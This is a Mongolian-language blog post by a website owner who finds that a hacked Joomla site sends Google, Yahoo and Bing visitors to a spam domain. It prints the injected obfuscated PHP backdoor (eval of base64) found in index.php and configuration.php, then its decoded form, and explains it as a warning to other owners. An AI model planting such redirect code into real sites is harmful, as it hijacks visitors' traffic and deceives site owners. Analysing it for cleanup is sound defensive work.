Сайт руу google-ээс зочин орохоо больчихож. Нэг л хачин санагдаад явчихлаа. Тэгээд google дээр КТ-ийн сайттай холбоотой үгүүдээр хайлт хийж үзлээ. Тэгсэн сайт ч бараг гарч ирсэнгүй. Тэгээд ганц нэг гарч ирж байгаа дээр нь дарахаар шал өөр сайт руу ороод байх юм. Тэр орж байгаа нь ямар ч гэнэ үү, нэг хогийн хулхины сайт бололтой. Та энэ зургийг нь харж байна.

Тэгээд энэ талаар сайтар хайж судаллаа.

Тэгсэн үндсэндээ хакердуулсан л юм байна л даа. Тэгээд гол файлууд дотор Google болон хайлтын системүүдээс орж ирэнгүүт нь өөр сайт руу чиглүүлчихдэг жижигхэн код оруулчихдаг ажээ. Харин эзэн хүн үүнийг огт анзаарч мэдэхгүйгээр хэдэн сар жил явж мэдэх юм. Яагаад гэхээр өөрийн сайт руугаа домэйнээ шууд бичихээр бүх юм хэвийн байх ажээ.

Хэрвээ та Joomla сайт ашигладаг бол index.php, configuration.php, includes/defines.php гэсэн файлуудыг нээж үзээрэй.

eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiZ29vZ2xlIikpIHsNCglpZiAoIXN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiLm51IikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInNpdGUiKSBhbmQgIXN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiaW51cmwiKSl7DQoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaWYgKHN0cmlzdHIoJGtrWzFdLCImIikpIHsNCgkJCXByZWdfbWF0Y2ggKCIvKC4qPylcJi8iLCRra1sxXSwka2V5Mik7DQoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOw0KCQl9ZWxzZSB7DQoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtrWzFdKTsNCgkJfQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2JlcmJoamVyZmRzLm9zYS5wbC8/cT0iLiRrZXl3b3JkKTsNCgkJZXhpdCgpOw0KCX0NCg0KfWVsc2VpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJ5YWhvbyIpKSB7DQpwcmVnX21hdGNoICgiL3BcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2diZXJiaGplcmZkcy5vc2EucGwvP3E9Ii4ka2tbMV0pOw0KCQlleGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImJpbmciKSkgew0KcHJlZ19tYXRjaCAoIi9xXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7DQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9nYmVyYmhqZXJmZHMub3NhLnBsLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ=="));

гэсэн аймшигтай сонин код нэмэгдсэн байх вий. Эхэн хавьцаа байгаа даа, андашгүй.
Түүнийг шууд устгаарай. Энэхүү кодыг Decode хийгээд үзвэл дараах код гарч ирэх ажээ.

if (stristr($_SERVER[HTTP_REFERER],"google")) {
if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
if (stristr($kk[1],"&")) {
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}else {
$keyword=urldecode($kk[1]);
}
header("Location: http://gberbhjerfds.osa.pl/?q=".$keyword);
exit();
}

}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://gberbhjerfds.osa.pl/?q=".$kk[1]);
exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://gberbhjerfds.osa.pl/?q=".$kk[1]);
exit();
}

PHP код ойлгодог хүн бүр л энэ хогийн кодыг шууд ойлгож байгаа биз ээ. Би хальт мулт тайлбарлаж өгье.

Эхний if нь болохоор Google-ээс дамжиж орж ирж байгаа эсэхийг шалгаж байна. Хэрвээ зочин хүн Google-ээс орж ирж байвал http://gberbhjerfds.osa.pl/ гэсэн хогийн сайт руугаа шидчихэж байгаа юм даа. Араас нь бас хэрэглэгчийн хайлт хийсэн үгийг залгаад байгаа юмаа.
Дараагийнх нь if болохоор yahoo, сүүлийнх нь болохоор bing гэсэн хайлтын системүүд ажээ.

Энэ хакердуулалт бол үнэндээ Joomla-тай ямар ч холбоогүй юм. Хэрвээ та энгийн FTP ашигладаг бөгөөд сайт руугаа хандахдаа нууц үгээ хадгалж байдаг бол энэ аюул танд ч бас заналхийлж байна.

Та бидний хэрэглэдэг Windows системд вирус, spyware хар мянгаараа үржиж, байрлаж байдгийг та эс мэдэх биш. Тэдний үндсэн үүрэг бол хэрэглэгч таны нууц үгийг олж аван эзэн рүүгээ илгээх юм. Ядаж байхад та бид IE, Firefox, Имэйлийн програм, FTP клиент програм зэрэгтээ хандах нууц үгээ хадгалчихдаг шүү дээ. Тэрийг чинь ядах юмгүй л илрүүлээд олзлоод авчихдаг юм байна.

Оросын ч юмуу хакерууд таны нууц үгийг олж аваад зүгээр л хандаж орон index.php мэтийн гол файлд чинь дээрх хогийн кодоо оруулчихдаг юм байна. Өөр ямар ч юм сэдсэнийг хэн мэдэх билээ.

Туршлагатай админууд нууц үгээ хэзээ ч битгий хадгалж бай гэдэг нь аргагүй л хаширсан хүний үг юм даа.